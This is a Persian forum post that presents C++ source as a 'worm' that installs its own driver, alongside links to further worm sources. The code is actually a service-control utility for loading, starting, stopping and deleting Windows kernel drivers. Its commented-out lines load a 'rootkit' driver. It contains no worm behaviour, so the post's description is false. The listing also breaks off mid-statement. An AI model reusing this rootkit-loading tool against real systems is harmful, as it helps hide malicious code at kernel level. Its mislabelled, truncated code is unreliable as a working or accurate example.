• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 1 رای - 5 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: C++ worm example
حالت خطی
#1
در سورس زیر یک کرم میبینید که با سی پلاس پلاس نوشته شده است این کرم باری خودش درایور هم نصب میکند.
چیز جالبیه

کد:
#include <windows.h>
#include <iostream>
using namespace std;
bool LoadDriver(char *DriverName, char *drivePath);
bool StopDriver(char *DriverName);
bool StartDriver(char *DriverName);
bool unLoadDriver(char *DriverName);
bool IfFileExists(char *filepath);

int main( int argc, const char* argv[])
{
    if(!argv[1])
    {
        cout << "Format: program.exe -p process" << endl <<
            "\tprogram.exe -start Driver Name" << endl <<
            "\tprogram.exe -stop Driver Name" << endl <<
            "\tprogram.exe -unload Driver Name" << endl <<
            "\tprogram.exe -load Name Path-to-sys-file" << endl;
        return 0;
    }
    if(!strcmp(argv[1], "-start"))
    {
        if(!argv[2])
        {
            cout << "Format: program.exe -start Driver Name";
            return 0;
        }
        StartDriver((CHAR*)argv[2]);
        return 0;
    }
    else if(!strcmp(argv[1], "-stop"))
    {
        if(!argv[2])
        {
            cout << "Format: program.exe -stop Driver Name";
            return 0;
        }
        StopDriver((CHAR*)argv[2]);
        return 0;
    }
    else if(!strcmp(argv[1], "-unload"))
    {
        if(!argv[2])
        {
            cout << "Format: program.exe -unload Driver Name";
            return 0;
        }
        unLoadDriver((CHAR*)argv[2]);
        return 0;
    }
    else if(!strcmp(argv[1], "-load"))
    {
        if(!argv[2])
        {
            cout << "Format: program.exe -load Name Path-to-sys-file" << endl;
            return 0;
        }
        LoadDriver((CHAR*)argv[2], (CHAR*)argv[3]);
        return 0;
    }
    return 0;
}
/*
int main()
{
//    StartDriver("rootkit");
//    StopDriver("rootkit");
//    unLoadDriver("rootkit");
//    LoadDriver("rootkit", "D:\\C++\\RootKitLoaderUtil\\rootkit.sys");
    return 0;
} */

bool LoadDriver(char *DriverName, char *drivePath)
{
    if(IfFileExists(drivePath)==FALSE)
    {
        cout << "Bad file path";
        return 0;
    }
    DWORD error = NULL;
    SC_HANDLE SCManager;
    SC_HANDLE Service;
    SCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

    cout << "Loading service: " << DriverName << " at " << drivePath << endl;

    Service = CreateService(SCManager, DriverName, DriverName, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, drivePath, NULL, NULL, NULL, NULL, NULL);
    error = GetLastError();
    if(error == 1073)
    {
        cout << "Service already exists with that name";
        CloseServiceHandle(Service);
        CloseServiceHandle(SCManager);
        return NULL;
    }
    if(error>0)
    {
        cout << "Error: " << error << endl;
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return NULL;
    }
    if(!Service)
    {
        if(error == ERROR_SERVICE_EXISTS)
        {
            cout << "Service exists with that name already.";
            CloseServiceHandle(SCManager);
            CloseServiceHandle(Service);
            return NULL;
        }
        else
        {
            CloseServiceHandle(SCManager);
            CloseServiceHandle(Service);
            cout << "Error: " << error;
            return NULL;
        }
    }
    CloseServiceHandle(SCManager);
    CloseServiceHandle(Service);
    return NULL;
}

bool StopDriver(char *DriverName)
{
    SC_HANDLE SCManager;
    SC_HANDLE Service;
    SERVICE_STATUS proc;
    DWORD error = NULL;
    //ZeroMemory(proc, sizeof(SERVICE_STATUS_PROCESS));
    SCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    Service = OpenService(SCManager, DriverName, SERVICE_ALL_ACCESS);
    error = GetLastError();
    if(error == 1060)
    {
        cout << "No service found by name";
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return TRUE;
    }
    if(error>0)
    {
        cout << "Error: " << error << endl;
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return NULL;
    }
    ControlService(Service, SERVICE_CONTROL_STOP, &proc);
    error = GetLastError();
    if(error>0)
    {
        cout << "Error: " << error << endl;
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return NULL;
    }
    CloseServiceHandle(SCManager);
    CloseServiceHandle(Service);
    return FALSE;
}

bool StartDriver(char *DriverName)
{
    SC_HANDLE SCManager;
    SC_HANDLE Service;
    DWORD error = NULL;
    SCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    Service = OpenService(SCManager, DriverName, SERVICE_ALL_ACCESS);
    error = GetLastError();
    if(error == 1060)
    {
        cout << "No service found by name";
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return NULL;
    }
    if(error>0)
    {
        cout << "Error: " << error << endl;
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return NULL;
    }    
    StartService(Service, 0, NULL);
    error = GetLastError();
    if(error>0)
    {
        cout << "Error: " << error << endl;
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return NULL;
    }
    if(error == ERROR_SERVICE_ALREADY_RUNNING)
    {
        cout << "Service already running";
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return NULL;
    }
    CloseServiceHandle(SCManager);
    CloseServiceHandle(Service);
    return NULL;
}

bool unLoadDriver(char *DriverName)
{
    bool status = StopDriver(DriverName);
    if(status == TRUE)
    {
        return NULL;
    }
    SC_HANDLE SCManager;
    SC_HANDLE Service;
    DWORD error = NULL;
    SCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    Service = OpenService(SCManager, DriverName, DELETE);
    error = GetLastError();

    if(error>0)
    {
        cout << "Error: " << error << endl;
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return NULL;
    }
    DeleteService(Service);
    error = GetLastError();
    if(error>0)
    {
        cout << "Error: " << error << endl;
        CloseServiceHandle(SCManager);
        CloseServiceHandle(Service);
        return NULL;
    }
    CloseServiceHandle(SCManager);
    CloseServiceHandle(Service);
    return NULL;
}

bool IfFileExists(char *filepath)
{
  FILE *file;
  file=fopen(filepath, "r");
  if(file==NULL)
  {
      return FALSE;
  }
  fclose(file);
  return
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


پیام‌های این موضوع
C++ worm example - توسط Amin_Mansouri - 09-28-2011، 06:15 PM

موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  Source Code IRC-Worm.Win32.Desire Delphi Amin_Mansouri 0 4,581 03-30-2012، 01:10 PM
آخرین ارسال: Amin_Mansouri
  Source Code LOA-worm Delphi Amin_Mansouri 0 6,207 03-30-2012، 01:05 PM
آخرین ارسال: Amin_Mansouri
  Source Code IRC-Worm.Hausex Delphi Amin_Mansouri 0 4,338 03-30-2012، 01:00 PM
آخرین ارسال: Amin_Mansouri
  (USB-Worm for UNIX/LINUX) Amin_Mansouri 0 3,373 11-09-2011، 03:17 PM
آخرین ارسال: Amin_Mansouri
  USB Worm C++ Amin_Mansouri 0 3,657 10-12-2011، 12:11 AM
آخرین ارسال: Amin_Mansouri
  [VB.NET]DC Worm Amin_Mansouri 0 5,408 09-26-2011، 09:41 AM
آخرین ارسال: Amin_Mansouri
  Delphi Usb Worm Amin_Mansouri 0 4,166 08-30-2011، 11:54 AM
آخرین ارسال: Amin_Mansouri
  Source Code Virus & Worm Amin_Mansouri 4 8,743 06-25-2011، 10:55 AM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: 1 مهمان